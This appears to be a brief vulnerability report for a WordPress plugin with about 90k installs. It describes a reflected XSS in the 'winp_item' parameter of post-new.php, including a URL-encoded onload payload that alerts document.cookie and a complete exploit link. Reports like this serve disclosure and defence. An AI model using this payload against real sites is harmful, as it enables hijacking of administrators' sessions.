Business Details:
CMS: WordPress
Active Installations: +90k
Downloads: +677k
Technical Details:
Bug Type: Reflected XSS
Severity: Medium
Affected Parameter: winp_item
Affected Path: https://[WEBSITE]/wp-admin/post-new.php
Used Payload:
phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqg
Full Link:
http://[WEBSITE]/wp-admin/post-new.php?post_type=wbcr-snippets&winp_item=phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqggm
Proof of Concept:
YouTube video